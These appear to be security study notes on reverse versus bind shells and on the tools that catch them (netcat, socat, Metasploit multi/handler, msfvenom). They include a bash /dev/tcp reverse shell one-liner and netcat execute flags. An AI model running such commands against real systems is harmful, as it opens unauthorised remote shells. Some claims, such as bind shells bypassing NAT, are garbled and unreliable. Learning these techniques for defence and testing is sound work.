Reverse Shells vs Bind Shells

Reverse Shell

• Victim connects to us

• Attack box is listening on a specific port

  • nc -lvp - means listening verbose port

  • -e /bin/sh executes

• By far the most commonly used

• Bash reverse shell command

  • bash -i >& /dev/tcp/0.0.0.0/4545 0>&1

Source: hackingtutorials.org

Bind Shell

• Open up a port on victim machine and then connect to it

• Useful when you have to bypass NAT or some sort of firewall

• When connection has to come from external or outside network boundary

Source: hackingtutorials.org

Tools

• Netcat

  • Used to manually perform all kinds of networking interactions, including things like banner grabbing during enumeration

  • Can be used to receive reverse shells and connect to remote ports attached to bind shells on a target system

  • Easy to lose but can be improved

• Socat

  • Like netcat on steroids

  • More stable than netcat shells out of the box

  • Two big catches:

    • The syntax is more difficult

    • Netcat is installed on every Linux distribution by default.

• Metasploit -- multi/handler

  • The auxiliary/multi/handler module of the Metasploit framework, used to receive reverse shells

  • A fully-fledged way to obtain stable shells, with further options to improve the caught shell

  • The only way to interact with a meterpreter shell, the easiest way to handle staged payloads

• Msfvenom

  • Used to generate payloads on the fly

  • Can generate payloads other than reverse and bind shells

• Groovy Reverse Shell